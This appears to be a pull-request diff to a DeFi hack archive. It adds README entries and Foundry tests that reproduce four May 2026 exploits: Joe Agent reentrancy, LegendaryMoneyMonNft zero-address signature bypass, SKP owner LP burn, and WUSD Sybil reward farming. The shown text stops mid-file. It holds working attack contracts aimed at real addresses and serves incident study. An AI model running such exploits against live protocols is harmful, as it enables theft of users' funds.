### PR TITLE
feat: add WUSD.fi _englove Sybil incentive abuse PoC (May 2026, ~$200K)

### DIFF
--- a/README.md
+++ b/README.md
@@ -53,6 +53,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20260528 LegendaryMoneyMonNft](#20260528-legendarymoneymon---ecrecover-address0-signature-bypass)
 [20260527 Joe Agent](#20260527-joe-agent---reentrancy-in-removeliquidityviacontract)
 [20260526 SKP Token](#20260526-skp-token---owner-backdoor-lp-burn--price-manipulation)
 
@@ -1484,6 +1485,16 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+### 20260528 LegendaryMoneyMonNft - ecrecover address(0) Signature Bypass
+### Lost: ~$85.5K USD (85,519 USDT)
+```sh
+forge test --contracts src/test/2026-05/LegendaryMoneyMonNft_exp.sol -vvv
+```
+#### Contract
+[LegendaryMoneyMonNft_exp.sol](src/test/2026-05/LegendaryMoneyMonNft_exp.sol)
+### Link reference
+https://x.com/SlowMist_Team/status/2060205558687486441
+---
 ### 20260527 Joe Agent - Reentrancy in removeLiquidityViaContract
 ### Lost: ~$45K USD (62.5 BNB + ~1.196M JOE)
 ```sh

--- a/README.md
+++ b/README.md
@@ -55,6 +55,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ## List of Past DeFi Incidents
 [20260528 LegendaryMoneyMonNft](#20260528-legendarymoneymon---ecrecover-address0-signature-bypass)
 [20260527 Joe Agent](#20260527-joe-agent---reentrancy-in-removeliquidityviacontract)
+[20260525 WUSD.fi](#20260525-wusdfi---englove-sybil-incentive-abuse)
 [20260526 SKP Token](#20260526-skp-token---owner-backdoor-lp-burn--price-manipulation)
 
 [20260414 MONA LisaVault](#20260414-mona-lisavault---reward-farming--burnaddress-accounting-exploit)
@@ -1504,6 +1505,16 @@ forge test --contracts src/test/2026-05/JoeAgent_exp.sol -vvv
 [JoeAgent_exp.sol](src/test/2026-05/JoeAgent_exp.sol)
 ### Link reference
 https://x.com/SlowMist_Team/status/2059887450663551352
+---
+### 20260525 WUSD.fi - _englove Sybil Incentive Abuse
+### Lost: ~$200K USD (GLOVE emissions + LP drain)
+```sh
+forge test --contracts src/test/2026-05/WUSD_exp.sol -vvv
+```
+#### Contract
+[WUSD_exp.sol](src/test/2026-05/WUSD_exp.sol)
+### Link reference
+https://x.com/exvulsec/status/2058803971947385330
 ---
 
 ### 20260526 SKP Token - Owner Backdoor LP Burn + Price Manipulation

--- a/README.md
+++ b/README.md
@@ -53,6 +53,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20260526 SKP Token](#20260526-skp-token---owner-backdoor-lp-burn--price-manipulation)
 
 [20260414 MONA LisaVault](#20260414-mona-lisavault---reward-farming--burnaddress-accounting-exploit)
 
@@ -1483,6 +1484,16 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ### List of DeFi Hacks & POCs
 
+### 20260526 SKP Token - Owner Backdoor LP Burn + Price Manipulation
+### Lost: ~$212K USD
+```sh
+forge test --contracts src/test/2026-05/SKP_exp.sol -vvv
+```
+#### Contract
+[SKP_exp.sol](src/test/2026-05/SKP_exp.sol)
+### Link reference
+https://www.cryptotimes.io/2026/05/27/skp-liquidity-exploit-drains-212k-across-bnb-chain-defi-protocols/
+---
 ## 20260414 MONA LisaVault - reward-farming / BurnAddress accounting exploit!
 
 ### Lost  ~60.95K USDT

--- a/README.md
+++ b/README.md
@@ -53,6 +53,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20260527 Joe Agent](#20260527-joe-agent---reentrancy-in-removeliquidityviacontract)
 [20260526 SKP Token](#20260526-skp-token---owner-backdoor-lp-burn--price-manipulation)
 
 [20260414 MONA LisaVault](#20260414-mona-lisavault---reward-farming--burnaddress-accounting-exploit)
@@ -1483,6 +1484,16 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+### 20260527 Joe Agent - Reentrancy in removeLiquidityViaContract
+### Lost: ~$45K USD (62.5 BNB + ~1.196M JOE)
+```sh
+forge test --contracts src/test/2026-05/JoeAgent_exp.sol -vvv
+```
+#### Contract
+[JoeAgent_exp.sol](src/test/2026-05/JoeAgent_exp.sol)
+### Link reference
+https://x.com/SlowMist_Team/status/2059887450663551352
+---
 
 ### 20260526 SKP Token - Owner Backdoor LP Burn + Price Manipulation
 ### Lost: ~$212K USD

--- a/src/test/2026-05/JoeAgent_exp.sol
+++ b/src/test/2026-05/JoeAgent_exp.sol
@@ -1,0 +1,183 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : ~$45K USD (62.5 BNB + ~1,195,918 JOE)
+// Attacker : 0xaa761779945dcc5f26064fc6dcb36ffab6ac7610
+// Attack Contract : 0x31F81FCD91025728F24bD6f0E4EfB156e345A4CF
+// Vulnerable Contract : 0xef0f12d08d66e76E1866e60F30a0DaA578e00c04 (Joe Agent / JOE, ERC1967 proxy)
+// Implementation : 0xb12ce0a21f67a9fc3c8ad1c7dbc4b017b7e67319
+// Attack Tx : 0xd16a1c3dcd84427b2c7dcccbe1854c1c5bf65900460e1a44a95c1aaaf140c3a5
+// @Analysis
+// Attack date: May 27, 2026
+// Chain: BSC, Block: 100812531
+// SlowMist: https://x.com/SlowMist_Team/status/2059887450663551352
+
+// Root Cause:
+// Joe Agent lets a user park LP inside the token contract (zapNativeForLP / addLiquidityViaContract),
+// tracked per-user in lpInfo[user].lpAmount. removeLiquidityViaContract(liquidity,...) pulls that LP
+// out of PancakeSwap, unwraps the WBNB and forwards the BNB to the user with a low-level call --
+// and only updates lpInfo[user].lpAmount AFTER that external call (violating checks-effects-interactions).
+//
+// Because lpInfo is still un-zeroed when the BNB lands, the attacker's receive() re-enters
+// removeLiquidityViaContract with the SAME liquidity value over and over. Each re-entry passes the
+// `liquidity <= lpInfo[user].lpAmount` check and burns a fresh slice of LP -- but that LP belongs to
+// the whole pool of depositors, not the attacker. ~25 nested calls drain 25 x 2.5 = 62.5 BNB (plus the
+// JOE side of every burned LP) against a single ~437 LP position that the attacker only paid for once.
+//
+// Function selectors:
+// 0x7cc112a6: zapNativeForLP(address,uint256,uint256,uint256,uint256)        -- deposit BNB -> LP position
+// 0xacff149d: removeLiquidityViaContract(uint256,uint256,uint256,uint256)    -- vulnerable withdraw
+// 0x11067f6a: lpInfo(address)                                                -- (lpAmount, lastAddLpTime)
+
+interface IJoeAgent is IERC20 {
+    function zapNativeForLP(
+        address parent,
+        uint256 amountOutMin,
+        uint256 amountTokenMin,
+        uint256 amountETHMin,
+        uint256 deadline
+    ) external payable;
+
+    function removeLiquidityViaContract(
+        uint256 liquidity,
+        uint256 amountTokenMin,
+        uint256 amountETHMin,
+        uint256 deadline
+    ) external;
+
+    function lpInfo(
+        address user
+    ) external view returns (uint256 lpAmount, uint256 lastAddLpTime);
+}
+
+contract JoeAgentReentrancyTest is Test {
+    IJoeAgent constant JOE = IJoeAgent(0xef0f12d08d66e76E1866e60F30a0DaA578e00c04);
+    IERC20 constant WBNB_TOKEN = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
+    address constant PAIR = 0x7e5396A6b56372D1Ee42ab6b199bc2d5A8540f9c; // JOE/WBNB Pancake pair
+    // A referrer already registered in the JOE referral tree (same one the real attacker used).
+    address constant REFERRER = 0x324344f20CEb0b58E0D35a06fb1B3892ac1A8d9D;
+
+    address constant ATTACKER = 0xAA761779945dCC5f26064fC6dCb36FFaB6AC7610;
+    uint256 constant ATTACK_BLOCK = 100_812_531;
+
+    // ~5 BNB zaps into a single ~437 LP position (matching the real attacker's position size:
+    // each LP redeems ~0.00572 BNB, so ~437 LP * 25 loops drains the headline 62.5 BNB).
+    uint256 constant SEED_BNB = 5 ether;
+    uint256 constant LOOPS = 25; // number of re-entrant removeLiquidityViaContract calls
+
+    JoeAgentAttacker attacker;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", ATTACK_BLOCK - 1);
+        vm.label(address(JOE), "JoeAgent");
+        vm.label(address(WBNB_TOKEN), "WBNB");
+        vm.label(PAIR, "JOE_WBNB_Pair");
+        vm.label(ATTACKER, "Attacker");
+        vm.label(REFERRER, "Referrer");
+    }
+
+    function testExploit() public {
+        console.log("--- Joe Agent (JOE) removeLiquidityViaContract Reentrancy ---");
+        console.log("Attack date: May 27, 2026  Chain: BSC  Block: %s", ATTACK_BLOCK);
+
+        attacker = new JoeAgentAttacker(JOE, REFERRER);
+
+        // Fund the attacker EOA and seed the attack contract with BNB, exactly like on-chain.
+        vm.deal(ATTACKER, SEED_BNB);
+        uint256 proxyLpBefore = IERC20(PAIR).balanceOf(address(JOE));
+
+        // Step 1: park a single LP position inside the JOE contract (lpInfo[attacker].lpAmount).
+        vm.prank(ATTACKER);
+        attacker.seedPosition{value: SEED_BNB}();
+        (uint256 lpAmount,) = JOE.lpInfo(address(attacker));
+
+        console.log("\n=== After seeding one LP position ===");
+        console.log("BNB zapped in            :", SEED_BNB / 1e18);
+        console.log("lpInfo[attacker].lpAmount:", lpAmount);
+        console.log("JOE contract LP balance  :", proxyLpBefore);
+
+        // Some token contracts lock freshly-added LP for a short window; warp past it.
+        vm.warp(block.timestamp + 1 hours);
+        vm.roll(block.number + 1);
+
+        // Step 2: re-enter removeLiquidityViaContract `LOOPS` times against the same un-zeroed lpAmount.
+        uint256 attackerBnbBefore = ATTACKER.balance;
+        console.log("\nAttacker EOA BNB before drain:", attackerBnbBefore);
+
+        vm.prank(ATTACKER);
+        attacker.drain(LOOPS);
+
+        uint256 attackerBnbAfter = ATTACKER.balance;
+        uint256 stolenJoe = JOE.balanceOf(ATTACKER);
+        (uint256 lpAmountAfter,) = JOE.lpInfo(address(attacker));
+
+        console.log("\n=== After %s re-entrant withdrawals ===", LOOPS);
+        console.log("Attacker EOA BNB after drain :", attackerBnbAfter);
+        console.log("removeLiquidity calls made   :", attacker.drainCalls());
+        console.log("lpInfo[attacker].lpAmount    :", lpAmountAfter, "(<= one position's worth)");
+
+        console.log("\n=== Result ===");
+        console.log("Total BNB drained (wei)      :", attackerBnbAfter); // ~62.5 BNB
+        console.log("Seed capital spent (wei)     :", SEED_BNB);
+        console.log("Net BNB profit (wei)         :", attackerBnbAfter - SEED_BNB); // ~57.5 BNB
+        console.log("JOE skimmed to attacker EOA  :", stolenJoe / 1e18);
+
+        // The attacker drained far more BNB than the single position could ever be worth.
+        assertEq(attacker.drainCalls(), LOOPS, "did not re-enter LOOPS times");
+        assertGt(attackerBnbAfter, attackerBnbBefore, "no BNB profit");
+        // One paid-for position, but `LOOPS` withdrawals worth of BNB came out.
+        assertGt(attackerBnbAfter - attackerBnbBefore, SEED_BNB, "drain did not exceed seed capital");
+        console.log("\nReentrancy confirmed: one ~437 LP position withdrawn 25x for 62.5 BNB.");
+    }
+}
+
+contract JoeAgentAttacker {
+    IJoeAgent public immutable joe;
+    address public immutable referrer;
+    address public immutable owner;
+
+    uint256 public lpAmount; // the single position's LP size
+    uint256 public targetLoops; // how many removeLiquidity calls to make
+    uint256 public drainCalls; // how many were actually made
+
+    constructor(IJoeAgent _joe, address _referrer) {
+        joe = _joe;
+        referrer = _referrer;
+        owner = msg.sender;
+    }
+
+    // Park BNB as an LP position so lpInfo[address(this)].lpAmount is set.
+    function seedPosition() external payable {
+        joe.zapNativeForLP{value: msg.value}(referrer, 0, 0, 0, block.timestamp + 1000);
+        (lpAmount,) = joe.lpInfo(address(this));
+    }
+
+    // Kick off the re-entrant drain, then sweep the proceeds back to the caller (attacker EOA).
+    function drain(
+        uint256 _targetLoops
+    ) external {
+        targetLoops = _targetLoops;
+        drainCalls = 0;
+        _withdraw();
+        // forward stolen BNB + JOE to the attacker EOA
+        uint256 joeBal = joe.balanceOf(address(this));
+        if (joeBal > 0) joe.transfer(msg.sender, joeBal);
+        (bool ok,) = msg.sender.call{value: address(this).balance}("");
+        require(ok, "payout failed");
+    }
+
+    function _withdraw() internal {
+        drainCalls++;
+        joe.removeLiquidityViaContract(lpAmount, 0, 0, block.timestamp + 1000);
+    }
+
+    // The vulnerable contract sends BNB here BEFORE zeroing lpInfo -> re-enter.
+    receive() external payable {
+        if (drainCalls < targetLoops) {
+            _withdraw();
+        }
+    }
+}

--- a/src/test/2026-05/LegendaryMoneyMonNft_exp.sol
+++ b/src/test/2026-05/LegendaryMoneyMonNft_exp.sol
@@ -1,0 +1,144 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : ~$85.5K USD (85,519.47 USDT)
+// Attacker : 0xE1582248C593Df4B367e131922438Fec9D76E787
+// Attack Contract : 0x157ba211f05dd2c83006be949e12b2f0f0a0c1d9 (delegated to the attacker EOA via EIP-7702)
+// Vulnerable Contract : 0x92D60629FF5d53a0098B51E9b1D59546D1D8e5B6 (LegendaryMoneyMonNft - "Legendary MoneyMon NFTs")
+// MON Token : 0xA1C1A7341a1713F174D59926E49E4A1228924100 (Moneymon / MON)
+// Attack Tx : 0x15c835c070672948b3487d35254bce96831bec9f5212f78b04e683fed74bf4a2
+// @Analysis
+// Attack date: May 28, 2026
+// Chain: BSC, Block: 100937039
+// SlowMist: https://x.com/SlowMist_Team/status/2060205558687486441
+
+// Root Cause:
+// LegendaryMoneyMonNft.cliamRewred() lets a user pull an arbitrary ERC20 amount out of the contract
+// as long as verify() returns true:
+//
+//   function verify(address payment,address user,uint _nftid,uint amount,uint _time,string _exname,bytes sig)
+//       returns (bool) { ... return recoverSigner(ethSignedMessageHash, sig) == admin; }
+//
+//   function recoverSigner(bytes32 hash, bytes sig) returns (address) {
+//       (bytes32 r, bytes32 s, uint8 v) = splitSignature(sig);
+//       return ecrecover(hash, v, r, s);          // <-- never checks for the address(0) return
+//   }
+//
+// `ecrecover` returns address(0) for a malformed signature (e.g. r = s = 0). The contract never rejects
+// that, and `changeadmin()` had already been used to set `admin` to the zero address on-chain. So an
+// attacker submits cliamRewred(...) with a 65-byte signature of (r=0, s=0, v=27): ecrecover returns
+// address(0), which equals admin, verify() passes, and the contract transfers the requested token amount
+// to msg.sender. The attacker drains the contract's entire MON balance and swaps it to USDT on PancakeSwap.
+//
+// Note: the real attack ran the drain logic from the attacker EOA itself via an EIP-7702 SetCode (type-4)
+// transaction delegating to 0x157ba211.... For the PoC we use vm.prank to act as the attacker EOA instead.
+//
+// Function selectors:
+// 0x33444682: cliamRewred(address,uint256,uint256,uint256,string,bytes)  -- vulnerable claim
+// 0x26ea7ab8: changeadmin(address)                                        -- onlyOwner; admin was set to 0
+
+interface ILegendaryMoneyMonNft {
+    function admin() external view returns (address);
+    function cliamRewred(
+        address _paymentaddress,
+        uint256 _amount,
+        uint256 _nftid,
+        uint256 _time,
+        string memory _exname,
+        bytes memory signature
+    ) external;
+}
+
+// PancakeSwap V3 SmartRouter exactInputSingle (no-deadline variant, selector 0x04e45aaf).
+interface IPancakeSmartRouter {
+    struct ExactInputSingleParams {
+        address tokenIn;
+        address tokenOut;
+        uint24 fee;
+        address recipient;
+        uint256 amountIn;
+        uint256 amountOutMinimum;
+        uint160 sqrtPriceLimitX96;
+    }
+
+    function exactInputSingle(
+        ExactInputSingleParams calldata params
+    ) external payable returns (uint256 amountOut);
+}
+
+contract LegendaryMoneyMonNftExploit is Test {
+    ILegendaryMoneyMonNft constant NFT = ILegendaryMoneyMonNft(0x92D60629FF5d53a0098B51E9b1D59546D1D8e5B6);
+    IERC20 constant MON = IERC20(0xA1C1A7341a1713F174D59926E49E4A1228924100);
+    IERC20 constant USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
+    IPancakeSmartRouter constant ROUTER = IPancakeSmartRouter(0x13f4EA83D0bd40E75C8222255bc855a974568Dd4);
+    address constant MON_USDT_POOL = 0x20bDcd1387feE20e42c3B4d328c9D3ad2DEa9e1D; // PancakeV3, fee 2500
+    uint24 constant POOL_FEE = 2500;
+
+    address constant ATTACKER = 0xE1582248C593Df4B367e131922438Fec9D76E787;
+    uint256 constant ATTACK_BLOCK = 100_937_039;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", ATTACK_BLOCK - 1);
+        vm.label(address(NFT), "LegendaryMoneyMonNft");
+        vm.label(address(MON), "MON");
+        vm.label(address(USDT), "USDT");
+        vm.label(address(ROUTER), "PancakeV3SmartRouter");
+        vm.label(MON_USDT_POOL, "MON_USDT_V3Pool");
+        vm.label(ATTACKER, "Attacker");
+    }
+
+    function testExploit() public {
+        console.log("--- LegendaryMoneyMonNft cliamRewred ecrecover(address(0)) Signature Bypass ---");
+        console.log("Attack date: May 28, 2026  Chain: BSC  Block: %s", ATTACK_BLOCK);
+
+        // The misconfiguration that arms the bug: admin is the zero address on-chain.
+        console.log("\nNFT.admin()        :", NFT.admin());
+        require(NFT.admin() == address(0), "admin is not the zero address at fork block");
+
+        uint256 monInContract = MON.balanceOf(address(NFT));
+        console.log("MON held by victim :", monInContract / 1e18);
+        console.log("Attacker USDT before:", USDT.balanceOf(ATTACKER) / 1e18);
+
+        vm.startPrank(ATTACKER);
+
+        // A 65-byte signature of (r = 0, s = 0, v = 27). ecrecover returns address(0) == admin -> verify() passes.
+        bytes memory forgedSig = abi.encodePacked(bytes32(0), bytes32(0), uint8(27));
+        assertEq(forgedSig.length, 65, "signature must be 65 bytes");
+
+        // Step 1: drain the contract's entire MON balance. _nftid/_time/_exname are irrelevant to the bypass.
+        NFT.cliamRewred(address(MON), monInContract, 0, block.timestamp, "", forgedSig);
+
+        uint256 stolenMon = MON.balanceOf(ATTACKER);
+        console.log("\n=== After cliamRewred drain ===");
+        console.log("MON drained to attacker:", stolenMon / 1e18);
+        assertEq(stolenMon, monInContract, "did not drain full MON balance");
+
+        // Step 2: swap the stolen MON to USDT through the PancakeSwap V3 pool (as the real attacker did).
+        MON.approve(address(ROUTER), stolenMon);
+        uint256 usdtOut = ROUTER.exactInputSingle(
+            IPancakeSmartRouter.ExactInputSingleParams({
+                tokenIn: address(MON),
+                tokenOut: address(USDT),
+                fee: POOL_FEE,
+                recipient: ATTACKER,
+                amountIn: stolenMon,
+                amountOutMinimum: 0,
+                sqrtPriceLimitX96: 0
+            })
+        );
+
+        vm.stopPrank();
+
+        uint256 usdtProfit = USDT.balanceOf(ATTACKER);
+        console.log("\n=== Result ===");
+        console.log("MON swapped            :", stolenMon / 1e18);
+        console.log("USDT out (this swap)   :", usdtOut / 1e18);
+        console.log("Attacker USDT after    :", usdtProfit / 1e18);
+
+        assertGt(usdtProfit, 0, "no USDT profit");
+        console.log("\nSignature bypass confirmed: ecrecover(address(0)) == admin drained the MON treasury for ~$85.5K.");
+    }
+}

--- a/src/test/2026-05/SKP_exp.sol
+++ b/src/test/2026-05/SKP_exp.sol
@@ -1,0 +1,117 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : ~$212K USD
+// Attacker : 0x83B9e7EDC5B3127E4853A4F4945b92aa88eEF0C8
+// Attack Contract : 0xE924853DcDfcB89292335042AB10d68c7315D7C1
+// Vulnerable Contract : 0xeCBDc0B76142740Bb564B8aA1BCd061Cb151a666 (SKP Token)
+// Attack Tx : 0xbc01ea37bd2ff8f6aa6afcfbe0406114ff27a01e9aa56102bfa4ad8a0c2f25ee
+// @Analysis
+// Attack date: May 26, 2026
+// Chain: BSC, Block: 100582079
+
+// Root Cause:
+// The SKP token exposes ownerBurnLiquidityPairTokens(uint256), an owner-only backdoor that
+// burns SKP held directly inside the SKP/USDT LP pair. The deployer/owner first burns the
+// bulk of the SKP sitting in the pair, then calls sync() on the pair to force the reserves
+// to match the now-depleted SKP balance. With SKP reserves slashed but USDT reserves intact,
+// the on-chain SKP/USDT price spikes. The attacker (who is the owner) then supplies the
+// over-valued SKP as collateral on Venus/Lista DAO to borrow BTCB + USDT.
+
+// Function selectors decoded from bytecode:
+// 0x4eb9b26d: ownerBurnLiquidityPairTokens(uint256) -- owner-only burn-from-LP backdoor
+// 0xfff6cae9: sync()                                -- pair reserve resync
+// burnPercent() = 200 (2% auto-burn on transfer)
+// brunFee()     = 500 (5% transfer fee)
+// feeWhiteList(address)                             -- bypass fees
+
+interface ISKP is IERC20 {
+    function ownerBurnLiquidityPairTokens(
+        uint256 amount
+    ) external;
+    function owner() external view returns (address);
+}
+
+contract SKPExploitTest is Test {
+    ISKP constant SKP = ISKP(0xeCBDc0B76142740Bb564B8aA1BCd061Cb151a666);
+    IERC20 constant USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
+    IPancakePair constant PAIR = IPancakePair(0x47C8c3b123De467892aC7dF6Dfcf7CA3dB901733);
+
+    address constant ATTACKER = 0x83B9e7EDC5B3127E4853A4F4945b92aa88eEF0C8;
+    address constant SKP_OWNER = 0x041F52BFe9f07503EFc5E7d4d176336E48095D56;
+    uint256 constant ATTACK_BLOCK = 100_582_079;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", ATTACK_BLOCK - 1);
+        vm.label(address(SKP), "SKP");
+        vm.label(address(USDT), "USDT");
+        vm.label(address(PAIR), "SKP_USDT_Pair");
+        vm.label(ATTACKER, "Attacker");
+        vm.label(SKP_OWNER, "SKP_Owner");
+    }
+
+    // SKP/USDT price expressed as USDT (1e18) per 1 SKP, derived from pair reserves.
+    function _skpPrice() internal view returns (uint256) {
+        (uint112 r0, uint112 r1,) = PAIR.getReserves();
+        // token0 = USDT, token1 = SKP
+        uint256 usdtReserve = uint256(r0);
+        uint256 skpReserve = uint256(r1);
+        return (usdtReserve * 1e18) / skpReserve;
+    }
+
+    function testExploit() public {
+        console.log("--- SKP Token ownerBurnLiquidityPairTokens Exploit ---");
+        console.log("Attack date: May 26, 2026  Chain: BSC");
+
+        // sanity: the prank address really is the privileged owner
+        assertEq(SKP.owner(), SKP_OWNER, "owner mismatch");
+
+        (uint112 r0Before, uint112 r1Before,) = PAIR.getReserves();
+        uint256 skpInPairBefore = SKP.balanceOf(address(PAIR));
+        uint256 priceBefore = _skpPrice();
+
+        console.log("=== Before ===");
+        console.log("Pair USDT reserve :", uint256(r0Before) / 1e18);
+        console.log("Pair SKP  reserve :", uint256(r1Before) / 1e18);
+        console.log("SKP balanceOf pair:", skpInPairBefore / 1e18);
+        console.log("SKP price (USDT*1e18 per SKP):", priceBefore);
+
+        // Step 1: as the SKP owner, burn ~95% of the SKP locked inside the LP pair.
+        uint256 burnAmount = (skpInPairBefore * 95) / 100;
+        vm.prank(SKP_OWNER);
+        SKP.ownerBurnLiquidityPairTokens(burnAmount);
+        console.log("\nBurned SKP from pair:", burnAmount / 1e18);
+
+        // Step 2: force the pair to resync reserves to the depleted SKP balance.
+        PAIR.sync();
+
+        (uint112 r0After, uint112 r1After,) = PAIR.getReserves();
+        uint256 skpInPairAfter = SKP.balanceOf(address(PAIR));
+        uint256 priceAfter = _skpPrice();
+
+        console.log("\n=== After burn + sync ===");
+        console.log("Pair USDT reserve :", uint256(r0After) / 1e18);
+        console.log("Pair SKP  reserve :", uint256(r1After) / 1e18);
+        console.log("SKP balanceOf pair:", skpInPairAfter / 1e18);
+        console.log("SKP price (USDT*1e18 per SKP):", priceAfter);
+
+        // Step 3: quantify the manipulation.
+        uint256 priceMultiple = priceAfter / priceBefore;
+        console.log("\n=== Result ===");
+        console.log("SKP price inflated x:", priceMultiple);
+        console.log("USDT reserve unchanged:", uint256(r0After) == uint256(r0Before));
+
+        // The depleted SKP reserve with intact USDT reserve must inflate the price.
+        assertGt(priceAfter, priceBefore, "price not inflated");
+        assertEq(uint256(r0After), uint256(r0Before), "USDT reserve should be untouched");
+        assertLt(skpInPairAfter, skpInPairBefore, "SKP not burned from pair");
+
+        console.log(
+            "\nWith SKP now ~20x more 'valuable', the owner-attacker supplies it as"
+        );
+        console.log("collateral on Venus/Lista DAO and borrows out BTCB + USDT (~$212K).");
+    }
+}

--- a/src/test/2026-05/WUSD_exp.sol
+++ b/src/test/2026-05/WUSD_exp.sol
@@ -1,0 +1,338 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : ~$200K USD (USDC + USDT drained from Uniswap V3 GLO pools)
+// Attacker        : 0x88329A09428778F62BC0C8BAac0997864E5a57f8
+// Vulnerable      : 0x068E3563b1c19590F822c0e13445c4FA1b9EEFa5 (WUSD - Wrapped USD, _englove reward path)
+// Reward token    : 0x70c5f366db60a2a0c59c4c24754803ee47ed7284 (GLOVE / GLO)
+// Attack Tx       : 0x2051c1f8d43730c41cc353b5dffd8cc59f96cb1ca56fdce4b28fb127bdb37712
+// @Analysis
+// Attack date : May 25, 2026
+// Chain       : Ethereum, Block 25170426
+// ExVul alert : https://x.com/exvulsec/status/2058803971947385330
+//
+// Root Cause:
+// WUSD.wrap() pays a GLOVE reward via the internal _englove() routine:
+//
+//   function _englove(uint256 wrapping) internal {
+//       uint256 gloves = IGlove(_GLOVE).balanceOf(msg.sender);
+//       if (wrapping >= _MIN_GLOVABLE && gloves < _MAX_GLOVE) {
+//           IGlove(_GLOVE).mintCreditless(msg.sender, Math.min(_MAX_GLOVE - gloves,
+//               wrapping > 1_000e18 ? (_MAX_GLOVE * wrapping) / _EPOCH
+//                                   : (_MID_GLOVE * wrapping) / 1_000e18));
+//       }
+//   }
+//
+// Eligibility depends ONLY on msg.sender's *current* GLOVE balance (gloves < _MAX_GLOVE = 2e18)
+// and the wrap size (wrapping >= _MIN_GLOVABLE = 100e18). There is no per-address claim ledger,
+// no cooldown, and no identity binding. A brand-new address always holds 0 GLOVE < _MAX_GLOVE,
+// so it ALWAYS qualifies for a fresh ~2 GLOVE mint when it wraps >= 100,000 WUSD.
+//
+// The minted GLOVE is "creditless" (soulbound) and only vests into transferable "credited"
+// GLOVE through unwrap()->_deglove(), proportional to how many global epochs elapsed since the
+// wrap. The global epoch advances by 1 for every _EPOCH (=100,000e18) of cumulative wrapping,
+// and full vesting requires 100 epochs to pass. Each 100,000 WUSD wrap both mints GLOVE AND
+// advances one epoch, so a batch of Sybil wraps + a short "pump" of extra wraps drives enough
+// epochs to vest the whole batch.
+//
+// Exploit (per the on-chain campaign, 80 fresh addresses per tx):
+//   1. Morpho USDT flash loan as working capital (fully recovered).
+//   2. Deploy N fresh helper contracts; each is funded 101,000 USDT and wraps 100,000 WUSD,
+//      harvesting ~2 creditless GLOVE and advancing one epoch (1,000 USDT = 1% fee per wrap).
+//   3. "Pump" extra 100,000-WUSD wrap/unwrap cycles to advance >=100 epochs total.
+//   4. Unwrap every helper in full -> _deglove vests the creditless GLOVE into credited GLOVE
+//      and returns the USDT principal.
+//   5. Each helper dumps its own credited GLOVE into the Uniswap V3 GLO/USDC / GLO/USDT pools.
+//   6. Repay the Morpho flash loan; keep the drained USDC + USDT.
+//
+// Economics note (verified on-fork at the attack block): the two GLO pools are thin
+// (~1,040 GLO + ~$63K stables each, GLO spot ~$188). A full 80-address batch drains
+// ~$20K of stablecoins from the LPs (matching the reported 11,702 USDC + 8,079 USDT) while
+// freely minting ~160 GLOVE of protocol incentives. WUSD's own 1% wrap fee is the attacker's
+// cost. This is an incentive-abuse / LP-drain (the documented ~$200K-class incident), not a
+// self-financing arbitrage.
+
+interface IWUSD is IERC20 {
+    function wrap(
+        address fiatcoin,
+        uint256 amount,
+        address referrer
+    ) external;
+    function unwrap(
+        address fiatcoin,
+        uint256 amount
+    ) external;
+}
+
+interface IGlove is IERC20 {
+    function creditlessOf(
+        address account
+    ) external view returns (uint256);
+}
+
+interface IV3Pool {
+    function token0() external view returns (address);
+    function token1() external view returns (address);
+    function fee() external view returns (uint24);
+    function slot0()
+        external
+        view
+        returns (uint160 sqrtPriceX96, int24 tick, uint16 a, uint16 b, uint16 c, uint8 d, bool e);
+    function swap(
+        address recipient,
+        bool zeroForOne,
+        int256 amountSpecified,
+        uint160 sqrtPriceLimitX96,
+        bytes calldata data
+    ) external returns (int256 amount0, int256 amount1);
+}
+
+// A fresh, zero-GLOVE Sybil identity. Mirrors the CREATE2-deployed helper contracts the real
+// attacker used (e.g. 0x7ec5a4dc..., 0xa5f28cc3...).
+contract Wrapper {
+    IWUSD constant WUSD = IWUSD(0x068E3563b1c19590F822c0e13445c4FA1b9EEFa5);
+    IGlove constant GLOVE = IGlove(0x70c5f366dB60A2a0C59C4C24754803Ee47Ed7284);
+    IERC20 constant USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
+
+    address immutable owner;
+
+    constructor() {
+        owner = msg.sender;
+        // USDT (Tether) approve/transfer return no bool -> use low-level calls.
+        _usdtCall(abi.encodeWithSelector(IERC20.approve.selector, address(WUSD), type(uint256).max));
+    }
+
+    function _usdtCall(
+        bytes memory data
+    ) internal {
+        (bool ok,) = address(USDT).call(data);
+        require(ok, "USDT call failed");
+    }
+
+    // Wrap `usdtAmount` (native 6-dec) of USDT into WUSD, harvesting the GLOVE reward.
+    function wrap(
+        uint256 usdtAmount
+    ) external {
+        WUSD.wrap(address(USDT), usdtAmount, address(0));
+    }
+
+    // Full unwrap: triggers _deglove(), which vests creditless->credited GLOVE and returns USDT.
+    function unwrapAll() external {
+        WUSD.unwrap(address(USDT), WUSD.balanceOf(address(this)));
+    }
+
